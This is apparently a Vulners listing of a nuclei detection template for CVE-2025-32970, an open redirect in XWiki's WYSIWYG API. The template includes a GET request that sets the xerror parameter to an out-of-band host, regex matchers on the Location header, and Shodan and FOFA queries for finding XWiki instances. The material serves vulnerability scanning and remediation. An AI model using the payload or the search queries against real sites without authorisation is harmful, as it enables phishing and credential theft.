Lucene search
K

XWiki WYSIWYG API - Open Redirect

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Vulnerability in XWiki WYSIWYG API allows open redirects via the xerror parameter, enabling phishing.

Related
Refs
Code
id: CVE-2025-32970

info:
  name: XWiki WYSIWYG API - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    A vulnerability in XWiki's WYSIWYG API allows an attacker to redirect users to arbitrary external URLs through the xerror parameter. This could be used in phishing attacks to redirect users to malicious websites.
  impact: |
    Attackers can redirect users to malicious external websites through the xerror parameter, potentially enabling phishing attacks and credential theft.
  remediation: |
    Upgrade to the latest XWiki version that properly validates redirect URLs in the WYSIWYG API.
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pjhg-9wr9-rj96
    - https://nvd.nist.gov/vuln/detail/CVE-2025-32970
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-601
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,redirect,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/bin/view/Main/?foo=bar&foo_syntax=invalid&RequiresHTMLConversion=foo&xerror=https://oast.me"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'

      - type: word
        part: header
        words:
          - text/javascript
# digest: 4b0a00483046022100a169224adb5b55c4949e10de1b531c009c3361616091b6a0a5588f9ec395e903022100eaa7557ddf922a3e27377202c3088ead8ccace7dc7784bb7a827fffba4d772e1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 3.16.1
EPSS0.00539
SSVC
9